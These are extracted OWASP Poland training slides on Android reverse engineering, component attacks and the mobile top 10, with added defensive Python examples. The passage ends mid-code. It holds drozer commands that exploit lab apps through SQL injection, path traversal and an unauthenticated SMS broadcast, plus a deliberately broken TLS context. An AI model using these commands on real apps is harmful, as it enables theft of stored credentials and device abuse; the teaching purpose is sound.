Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Dalvik VMbull The software that runs the apps on Android devicesbull Its fast even on weak CPUs bull it will run on systems with little memory bull it will run in an energy-efficient way bull Provides application portability and runtime consistency bull Runs optimized file format (dex) and Dalvik bytecodebull Java class jar files converted to dex at build time
ART VS DVMbull Android 44 ndash Experimental From android 50 - Defaultbull Ahead-of-time (AOT) compilationbull Improved garbage collectionbull Improved diagnostic detail in exceptions and crash reports
Application Framework
• Activity Manager – manages the activity life cycle of applications
• Content Providers – manage data sharing between applications
• Telephony Manager – manages all voice calls
• Location Manager – location management using GPS or cell towers
• Resource Manager – manages the various types of resources used in an application
Application Layer
• SMS client app
• Dialer
• Web browser
• Contact manager
APK: how it works
Android Application Security
• Android sandbox
• Permission labels defined in AndroidManifest.xml
• Signature
• Install-time security decisions
• Android 6.0 security release
Android 6.0
• Runtime permissions
• Verified Boot
• Hardware-isolated security
• Fingerprints
• SD card adoption
• Clear-text traffic (android:usesCleartextTraffic)
• System hardening
• USB access control
Defense layers (Google Play)
1. Require and validate developer information
2. Review applications before distribution
3. Permanently stop distribution
4. Reduce attacker flexibility
5. Remove applications after installation
Apps from Unknown Sources
By default only Google Play and other pre-installed app stores are allowed to install apps.
The vast majority of installs come from Google Play.
Verify Apps
Apps are verified prior to install.
Warns about or blocks Potentially Harmful Applications.
Over 10 million installs verified every day.
Verification is on, and visible when needed.
Core security features to build a secure application
• The Android Application Sandbox
• An application framework with robust implementations of common security functionality such as cryptography and permissions
• An encrypted file system that can be enabled to protect data on lost or stolen devices
• User-granted permissions to restrict access to system features and user data
• Application-defined permissions to control application data on a per-app basis
Thank you
Any questions
Application Components Security
Alexander Antukh, OWASP Poland, 24.02.2016
Android Application Security
Often the app contains some sensitive data:
• Passwords
• Authentication tokens
• Contacts
• Communication records
• IP addresses or domain names of sensitive services
Android Application Security
Global problems in securing the applications:
• How sensitive data is stored
  – Isolation
  – Privilege separation
• How sensitive data is transmitted
  – Extra-device communication
  – Inter-application communication
  – Inter-component communication
Android Application Components
• Activities
• Services
• Content providers
• Broadcast receivers
AndroidManifest.xml defines how the app works and what kind of interaction between components and the outer world is possible. Permissions are declared there too.
• Activities – <activity>
• Services – <service>
• Content providers – <provider>
• Broadcast receivers – <receiver>
Android Manifest
Sample manifest file. Note the following:
• Permissions

    <uses-permission android:name="string" />
    <permission android:protectionLevel="…" />

• Components and their attributes
[Screenshot: AndroidManifest.xml]
Android Manifest
Protection levels:
• dangerous – increased risk (directly affects users)
• normal – minimal risk (default value)
• signature – requesting app signed with the same certificate
• signatureOrSystem – same certificate || app in the Android system image
Android Manifest
Component attributes relevant to security:
• debuggable
• enabled
• exported
• permission
Example component attributes (Activities, Services, Content providers, Broadcast receivers)
Intents
An intent is a messaging object that is created and delivered to an intended application component. It carries all relevant information about the calling application, the desired target component and the requested action/data.

    // Explicit intent: open a URL in one specific activity of the stock browser
    Intent intent = new Intent(Intent.ACTION_VIEW);
    intent.setData(Uri.parse("http://www.google.com"));
    String pack = "com.android.browser";
    ComponentName comp = new ComponentName(pack, pack + ".BrowserActivity");
    intent.setComponent(comp);
    startActivity(intent);
Drozer
Open source tool to interact with other applications through IPC; the leading security assessment framework for Android.
Manual on installation and usage: see the drozer user guide in the references.
The best thing about drozer: you don't need to write your own apps to interact with other apps :)

    dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://www.google.com --component com.android.browser com.android.browser.BrowserActivity

Drozer is installed in the default AppUse package together with adb, so it is enough to just "click and play".
Activity components
An Activity provides a screen with which users can interact in order to do something. Users can perform operations such as making a call, sending an SMS, etc.
Example: the login screen of your Facebook app
Activities
Activity components attacks
• If an activity can be triggered by other apps (by an attacker), it can be abused
• By launching it with intents it is possible to achieve the following:
  – Modify data in the background
  – Trick the user
  – Leak sensitive information
Activity components attacks
• General hijacking scheme
  [Diagram: general hijacking scheme with components A, B and E]
• Results of an attack
  – A malicious Activity could read the data in the Intent and then immediately relay it to a legitimate one
  – Spoofing the expected Activity's user interface to steal user-supplied data (phishing)
Activity components attacks
• List and launch exported activities

    dz> run app.activity.info -a com.mwr.example.sieve
    Package: com.mwr.example.sieve
      com.mwr.example.sieve.FileSelectActivity
      com.mwr.example.sieve.MainLoginActivity
      com.mwr.example.sieve.PWList
    dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
Activity components: demo
Services
A Service can perform long-running operations in the background and does not provide a user interface. Other components can bind to a Service, which lets the binder invoke methods declared in the target Service's interface. Intents are used to start and bind to Services.
Example: playing music or downloading a file
Services attacks
Although services generally don't seem dangerous, they could potentially perform sensitive operations.
To attack a service one needs an interaction point: it must be exported, or accept input through intents, files or the network stack.
Typical attacks: Denial of Service and Information Leakage
• Find exported services
• Launch them one by one with logcat running to check for sensitive info
• Fire off intents and wait for it
Content providers
A content provider presents data to external applications as one or more tables. In other words, content providers can be treated as interfaces that connect data in one process with code running in another process.
Example: using content providers, any app holding the READ_SMS permission can read SMS from the built-in SMS app's repository on the device
• What info can they hold?
  – User's phone numbers
  – Passwords
  – SMS
• And one of the main problems is, again, permissions

    run app.provider.info --permission null
Content providers attacks
• Unrestricted access to an app database
  – Just query it: run app.provider.query content://settings/secure
• SQL injection
• Path traversal
Other attack vectors (e.g. against authentication) might include altering data, for instance with the app.provider.insert command.

    dz> run scanner.provider.injection -a com.mwr.example.sieve
Content providers attacks
• Unrestricted access to an app database

    dz> run scanner.provider.finduris -a com.mwr.example.sieve
    Accessible content URIs:
      content://com.mwr.example.sieve.DBContentProvider/Keys
      content://com.mwr.example.sieve.DBContentProvider/Passwords
      content://com.mwr.example.sieve.DBContentProvider/Passwords/
    dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
Content providers attacks
• SQL injection

    dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
    unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
    dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key--"
    | Password         | pin  |
    | thisismypassword | 9876 |
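The two queries above work because the provider pastes the caller's projection and selection straight into its SQL. The Python below is an added example, not code from the slides or from the Sieve app: it rebuilds that query construction over an in-memory sqlite3 database with a small constructed schema modelled on Sieve's Passwords and Key tables, reproduces what the `* FROM Key--` projection and the `'` selection do, and sets a hardened builder next to it that accepts only allow-listed column names and binds filter values as parameters. Table contents and column names are made up.

```python
import sqlite3

# Constructed schema modelled on the Sieve tables seen in the drozer output above.
SCHEMA = """
CREATE TABLE Passwords (_id INTEGER PRIMARY KEY, service TEXT, username TEXT, password BLOB);
CREATE TABLE Key (Password TEXT, pin TEXT);
INSERT INTO Passwords (service, username, password) VALUES ('Gmail', 'alice', X'DEADBEEF');
INSERT INTO Passwords (service, username, password) VALUES ('Bank', 'alice', X'CAFEBABE');
INSERT INTO Key VALUES ('thisismypassword', '9876');
"""


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def vulnerable_query(db, projection=None, selection=None, selection_args=()):
    """How a provider's query() behaves when it trusts the caller's projection and
    selection: both are pasted into the statement text, exactly as the Sieve
    provider does. selection_args are bound, but by then the damage is done."""
    columns = ", ".join(projection) if projection else "*"
    where = " WHERE (%s)" % selection if selection else ""
    sql = "SELECT %s FROM Passwords%s" % (columns, where)
    return db.execute(sql, selection_args).fetchall()


# Hardened variant: the caller may only name known columns and known filters.
ALLOWED_COLUMNS = ("_id", "service", "username")   # the password column is never exposed
ALLOWED_FILTERS = {"service": "service = ?", "username": "username = ?"}


def hardened_query(db, projection=None, filters=None):
    """filters maps an allow-listed column name to the value to match; values are
    always bound as parameters, so quotes or comment markers in them stay data."""
    columns = tuple(projection) if projection else ALLOWED_COLUMNS
    for column in columns:
        if column not in ALLOWED_COLUMNS:
            raise ValueError("column not allowed in projection: %r" % column)
    clauses, args = [], []
    for column, value in (filters or {}).items():
        if column not in ALLOWED_FILTERS:
            raise ValueError("column not allowed in selection: %r" % column)
        clauses.append(ALLOWED_FILTERS[column])
        args.append(value)
    sql = "SELECT %s FROM Passwords" % ", ".join(columns)
    if clauses:
        sql += " WHERE " + " AND ".join(clauses)
    return db.execute(sql, args).fetchall()
```

With the vulnerable builder, `projection=["* FROM Key--"]` turns the statement into `SELECT * FROM Key-- FROM Passwords`, which is why the Key row comes back; the hardened builder rejects that projection before any SQL is assembled, and a value such as `' OR 1=1--` passed as a filter simply matches no row.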
Content providers attacks
• Path traversal
One interesting real-life example: http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application

    dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
    127.0.0.1 localhost
    dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
    Written 24576 bytes
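The FileBackupProvider calls above succeed because openFile() passes the URI path to the filesystem untouched. As an added example (not code from the slides or from Sieve), here is that behaviour next to a resolver that confines requests to the directory the provider is meant to serve; BACKUP_DIR is a made-up path, and the check works on path strings so it runs without a device.

```python
import posixpath
from urllib.parse import unquote

# Constructed directory the provider is meant to serve; not a path from the slides.
BACKUP_DIR = "/data/data/com.example.backup/files/backup"


def vulnerable_open_path(uri_path):
    """What a provider does when openFile() hands the URI path to the filesystem
    untouched: content://<authority>/etc/hosts opens /etc/hosts, and so does any
    other file the app's UID may read, as the two drozer calls above show."""
    return uri_path


def hardened_open_path(uri_path):
    """Resolve the URI path inside BACKUP_DIR and return the file to open, or None
    if the request would escape that directory."""
    # Android's Uri.getPath() already hands the provider a decoded path; decoding
    # once here means encoded dots and slashes are checked in their real form.
    decoded = unquote(uri_path)
    # A leading slash must not let the caller replace the base directory.
    relative = decoded.lstrip("/")
    # Collapse '.', '..' and repeated slashes the way the kernel would before the
    # containment check, so 'a/../../x' cannot slip past a prefix comparison.
    candidate = posixpath.normpath(posixpath.join(BACKUP_DIR, relative))
    # The '/' suffix stops a sibling such as .../backup2 from passing as inside.
    if candidate == BACKUP_DIR or candidate.startswith(BACKUP_DIR + "/"):
        return candidate
    return None
```

Note the order: decode, strip the leading slash, normalise, then compare. Comparing before normalising is the classic mistake, because `backup/../../x` starts with the base directory as a string but does not stay inside it.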
Content providers: demo
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as "battery low", "boot completed", "headset plugged in", etc. Though most broadcasts originate from the system, applications can also announce broadcasts.
• If a receiver accepts broadcasts from untrusted sources, the app is at risk
Broadcast receivers attacks
Typical fail: authorization
• Enumerate receivers
• Determine how the receiver handles the action
• Send the intent and enjoy
Sample manifest from GoatDroid:

    <receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
        <intent-filter>
            <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
        </intent-filter>
    </receiver>
    …
    <uses-permission android:name="android.permission.SEND_SMS" />
Broadcast receivers attacks
The following is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action (note that nothing checks who sent the broadcast):

    public void onReceive(Context arg0, Intent arg1) {
        context = arg0;
        SmsManager sms = SmsManager.getDefault();
        Bundle bundle = arg1.getExtras();
        // phoneNumber and message come straight from the unauthenticated intent
        sms.sendTextMessage(bundle.getString("phoneNumber"), null,
                bundle.getString("message"), null, null);
        Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
    }
Broadcast receivers attacks

    run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
General defenses for App Components
Applies to all of the above-mentioned items:
• Setting the android:exported attribute to false (only components running under the same user ID as the current app will be able to access the component)
• Limiting access with the android:permission attribute: a custom permission (declared with a signature protection level) or an existing one such as RECEIVE_SMS
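The manifest attributes discussed earlier (exported, permission, protectionLevel, debuggable) and the two defenses above can be checked mechanically on a decompiled AndroidManifest.xml. The following Python is an added example, not a tool from the slides: it applies Android's export rules (an explicit android:exported wins; otherwise an intent filter makes a component exported, and a provider is exported by default below minSdkVersion 17) and reports exported components that carry no permission or only a permission the app itself declares at protectionLevel normal. The sample manifest is constructed for the example and only modelled on the GoatDroid receiver shown above; package and component names are invented.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "service", "receiver", "provider")


def _attr(elem, name):
    """Read an android:-namespaced attribute."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def is_exported(component, min_sdk):
    """Android's rule: an explicit android:exported wins; otherwise a component is
    exported if it has an <intent-filter>, and a <provider> is exported by default
    when minSdkVersion is below 17."""
    explicit = _attr(component, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    if component.tag == "provider":
        return min_sdk < 17
    return component.find("intent-filter") is not None


def _is_launcher(component):
    for intent_filter in component.findall("intent-filter"):
        for category in intent_filter.findall("category"):
            if _attr(category, "name") == "android.intent.category.LAUNCHER":
                return True
    return False


def audit_manifest(manifest_xml):
    """Return (tag, name, finding) tuples for settings that widen the attack surface."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package")
    uses_sdk = root.find("uses-sdk")
    min_sdk = int(_attr(uses_sdk, "minSdkVersion") or 1) if uses_sdk is not None else 1
    # Protection level of every permission the app itself declares ("normal" is the default).
    levels = {_attr(p, "name"): (_attr(p, "protectionLevel") or "normal")
              for p in root.findall("permission")}
    findings = []
    app = root.find("application")
    if app is None:
        return findings
    if (_attr(app, "debuggable") or "false").lower() == "true":
        findings.append(("application", package, "android:debuggable is true"))
    for comp in app:
        if comp.tag not in COMPONENT_TAGS or not is_exported(comp, min_sdk):
            continue
        if comp.tag == "activity" and _is_launcher(comp):
            continue  # the launcher activity has to be reachable; nothing to report
        name = _attr(comp, "name")
        guards = [p for p in (_attr(comp, "permission"), _attr(comp, "readPermission"),
                              _attr(comp, "writePermission")) if p]
        if not guards:
            findings.append((comp.tag, name, "exported without any permission"))
            continue
        for perm in guards:
            # An app-declared permission with protectionLevel "normal" is granted to
            # any app that requests it, so it does not actually restrict access.
            if levels.get(perm) == "normal":
                findings.append((comp.tag, name, "guarded only by normal-level permission " + perm))
    return findings


# Constructed manifest (not GoatDroid's real one) exercising each rule above.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="org.example.fourgoats">
  <uses-sdk android:minSdkVersion="15" />
  <uses-permission android:name="android.permission.SEND_SMS" />
  <permission android:name="org.example.fourgoats.WEAK" android:protectionLevel="normal" />
  <permission android:name="org.example.fourgoats.STRONG" android:protectionLevel="signature" />
  <application android:debuggable="true">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN" />
        <category android:name="android.intent.category.LAUNCHER" />
      </intent-filter>
    </activity>
    <receiver android:name=".broadcastreceivers.SendSMSNowReceiver">
      <intent-filter>
        <action android:name="org.example.fourgoats.SOCIAL_SMS" />
      </intent-filter>
    </receiver>
    <service android:name=".SyncService" android:exported="true"
             android:permission="org.example.fourgoats.WEAK" />
    <service android:name=".InternalService" android:exported="false" />
    <provider android:name=".DBContentProvider"
              android:authorities="org.example.fourgoats.provider"
              android:permission="org.example.fourgoats.STRONG" />
  </application>
</manifest>
"""

if __name__ == "__main__":
    for tag, name, finding in audit_manifest(SAMPLE_MANIFEST):
        print("%-12s %-45s %s" % (tag, name, finding))
```

Run it on the manifest apktool extracts (the binary manifest inside the apk has to be decoded first). The receiver without a permission and the service behind a normal-level permission are exactly the cases drozer's app.broadcast.send and app.service.start can reach from another package.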
References
• http://developer.android.com/guide/components/index.html
• http://developer.android.com/guide/topics/manifest/manifest-intro.html
• http://resources.infosecinstitute.com/android-hacking-security-part-1-exploiting-securing-application-components/
• http://resources.infosecinstitute.com/android-hacking-security-part-2-content-provider-leakage/
• http://resources.infosecinstitute.com/android-hacking-security-part-3-exploiting-broadcast-receivers/
• http://yinzhicao.org/courses/f15/cse343443/slides/mobilesecurity.pdf
• https://www.safaribooksonline.com/library/view/android-security-cookbook/
• https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf
• https://manifestsecurity.com/android-application-security-part-5
• https://manifestsecurity.com/android-application-security-part-8
• https://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf
• http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
• https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet#android-application-penetration-testing
Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel Rzepa, OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to give you basic knowledge about mobile risks and an easy methodology for finding those risks in your applications
• If you want to add anything important/interesting and related to the topic – feel free to interrupt me :)
What are we going to talk about…
Before we start… the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple-words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in data stores on the device in an insecure format (plain text or a reversible encoding)
Insecure data storage – what to look for
• Look for any sensitive information in:
  – SQLite databases (local)
  – XML data stores
  – Plain-text configuration files
  – Cookie stores
  – SD card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes on the SD card before and after installing the application
• Analyze the package files at different stages:

    adb pull /data/data/<apk_package_name>
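As an added example (not from the slides), two checks that go with the adb commands above: parse `adb shell ls -l` output for files any other app can read, and scan a pulled SharedPreferences XML file for secret-looking keys stored in plain text. The listing and the preferences file are constructed samples, not output from a real app; the key-name heuristic is deliberately coarse and meant for triage.

```python
import re
import xml.etree.ElementTree as ET

# One `ls -l` entry as printed by Android's toolbox/toybox: mode, optional link
# count, owner, group, size, date, time, name.
LS_LINE = re.compile(
    r"^([-dl][rwxsStT-]{9})\s+(?:\d+\s+)?(\S+)\s+(\S+)\s+(\d+)\s+(\S+\s+\S+)\s+(.+)$")
# Coarse heuristic for preference keys that should never hold plain-text values.
SECRET_KEY = re.compile(r"pass(word|wd)?|secret|token|pin|credential|api[_-]?key", re.I)


def parse_ls(output):
    """Yield (mode, name) for every entry in `ls -l` output the pattern recognises."""
    for line in output.splitlines():
        match = LS_LINE.match(line.strip())
        if match:
            yield match.group(1), match.group(6)


def world_readable(mode):
    """The 'other' read bit is position 7 of the ten-character mode string."""
    return mode[7] == "r"


def find_world_readable(output):
    """Names of entries any other app on the device can read."""
    return [name for mode, name in parse_ls(output) if world_readable(mode)]


def find_plaintext_secrets(prefs_xml):
    """(key, value) pairs in a SharedPreferences file whose key looks like a secret."""
    root = ET.fromstring(prefs_xml)
    hits = []
    for elem in root:
        key = elem.get("name", "")
        if SECRET_KEY.search(key):
            # <string> keeps its value as text; the other types use a value attribute.
            value = elem.text if elem.tag == "string" else elem.get("value")
            hits.append((key, value))
    return hits


# Constructed samples standing in for `adb shell ls -l` and a pulled prefs file.
SAMPLE_LS = """\
drwxrwx--x 3 u0_a51 u0_a51  4096 2016-02-24 10:00 databases
-rw-rw---- 1 u0_a51 u0_a51 24576 2016-02-24 10:00 database.db
-rw-rw-rw- 1 u0_a51 u0_a51  1203 2016-02-24 10:01 user.xml
-rw-r--r-- 1 u0_a51 u0_a51   512 2016-02-24 10:01 debug.log
"""

SAMPLE_PREFS = """<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="username">alice</string>
    <string name="password">hunter2</string>
    <string name="auth_token">tok3n-4f9a1</string>
    <boolean name="remember_me" value="true" />
    <int name="pin_code" value="1234" />
</map>
"""
```

Files that show up in the first check are what MODE_WORLD_READABLE (or an SD card location) produces; hits in the second are candidates for the "plain text or reversible encoding" finding and still need a look at how the value is actually used.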
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted, world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (e.g. request device-level storage encryption with DevicePolicyManager.setStorageEncryption)
• For databases consider using SQLCipher for SQLite data encryption
• Ensure no shared preferences are created with MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple-words definition: the application does NOT implement TLS, or implements it incorrectly
What do you mean, "incorrectly"?
• Insecure implementations are:
  – Using known weak protocol versions or ciphers (e.g. SSLv2/SSLv3, RC4)
  – Securing only part of the communication (e.g. only authentication)
  – Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is done by the browser
• It is done through a "chain of trust"
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• The expected X.509 certificate or public key is embedded in the source code

    if (presented_cert == pinned_cert)
        start_connection();
    else
        drop_connection();
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked the developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
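The pseudocode on the theory slide and the two failure modes from the Hannover study translate into the following Python, added here as an example and not code from the slides or from the study. It pins the SHA-256 fingerprint of the server's DER certificate on top of normal CA and hostname validation, allows a backup pin, and fails closed; next to it is what "trust all certificates / accept all hostnames" looks like in the same API. Host, port and the DER stand-in are placeholders so the pin check itself runs offline.

```python
import hashlib
import hmac
import socket
import ssl


def cert_fingerprint(der_cert):
    """SHA-256 of the DER-encoded certificate as lower-case hex."""
    return hashlib.sha256(der_cert).hexdigest()


def pin_matches(der_cert, pins):
    """True if the presented certificate matches one of the pinned fingerprints.
    More than one pin is accepted so a backup certificate can be rolled in
    without an app update locking users out."""
    presented = cert_fingerprint(der_cert)
    return any(hmac.compare_digest(presented, pin.lower()) for pin in pins)


def broken_context():
    """The two mistakes the Hannover study found, in Python terms. Never ship this."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False        # "accept all hostnames"
    ctx.verify_mode = ssl.CERT_NONE   # "trust all certificates"
    return ctx


def pinned_context():
    """CA chain validation and hostname checking stay on; the pin is checked on top."""
    return ssl.create_default_context()


def pinned_connect(host, port, pins, timeout=5.0):
    """Connect, validate the chain and hostname, then require a pinned certificate.
    Fails closed: a mismatch raises instead of falling back to an unpinned session."""
    sock = socket.create_connection((host, port), timeout=timeout)
    tls = pinned_context().wrap_socket(sock, server_hostname=host)
    try:
        der = tls.getpeercert(binary_form=True)
        if not pin_matches(der, pins):
            raise ssl.SSLError("certificate pin mismatch for %s" % host)
    except Exception:
        tls.close()
        raise
    return tls


# Constructed stand-in for a DER certificate, so the pin check runs offline.
SAMPLE_DER = b"constructed-der-bytes-not-a-real-certificate"
PINS = [cert_fingerprint(SAMPLE_DER)]   # in an app this list is compiled in
```

A real app usually pins the hash of the SubjectPublicKeyInfo rather than the whole certificate, so a renewed certificate carrying the same key keeps working; the comparison is the same. Whatever is pinned, the check sits after, not instead of, chain validation: a pin with CERT_NONE still lets a hostname mismatch through on any certificate that happens to match.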
Insufficient transport layer protection – how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use Mallodroid:

    mallodroid.py -f AppToCheck.apk -d javaout

• Look for endpoint implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest/ for a public domain):

    sslyze --regular www.example.com:443
Insufficient transport layer protection – example
Insufficient transport layer protection – a few facts from reality
• According to FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store…
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection – mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple-words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage is about the developer's conscious decision to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leaks
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending the GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using drozer:

    dz> run app.provider.finduri <package_name>

• Use logcat to verify what is being logged:

    adb logcat [output filter]

• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (watch what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable="false")
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what it is
• Simple-words definition: if you're able to bypass authentication and/or escalate your privileges, then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using drozer:

    dz> run app.activity.start --component <component_name>

• Intercept traffic with Burp and modify parameters to log in as another user / see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise the operating system
• For example, the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember tohellip
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed; they must be enforced on the server side whenever possible
• Persistent authentication ("Remember Me") functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple-words definition: using an insecure implementation, or implementing it in an insecure way
• A few reminders (yeah, I know you know it…)
  – encoding ≠ encryption
  – obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar and review the jar file in JD-GUI (or Luyten for a more verbose result)
• Look for decryption keys (in attacker-readable folders or hardcoded within the binary)
• Try to break the encryption algorithm if the application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1, etc.)
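Once dex2jar and a decompiler have produced Java, the review points on the list above can be grepped for. The scanner below is an added example, not a tool from the slides: it flags weak or deprecated algorithms passed to Cipher.getInstance and MessageDigest.getInstance, ECB mode (including the no-mode form, which Java's providers default to ECB), and key material that reaches SecretKeySpec from a string literal, a byte-array literal or a static final constant. The Java it scans is a constructed sample.

```python
import re

WEAK_CIPHERS = {"DES", "DESEDE", "RC2", "RC4", "ARCFOUR", "BLOWFISH"}
WEAK_DIGESTS = {"MD2", "MD4", "MD5", "SHA1"}    # compared with '-' removed

CIPHER_CALL = re.compile(r'Cipher\.getInstance\(\s*"([^"]+)"')
DIGEST_CALL = re.compile(r'MessageDigest\.getInstance\(\s*"([^"]+)"')
KEYSPEC_CALL = re.compile(r'new\s+SecretKeySpec\(\s*([^,]+),')
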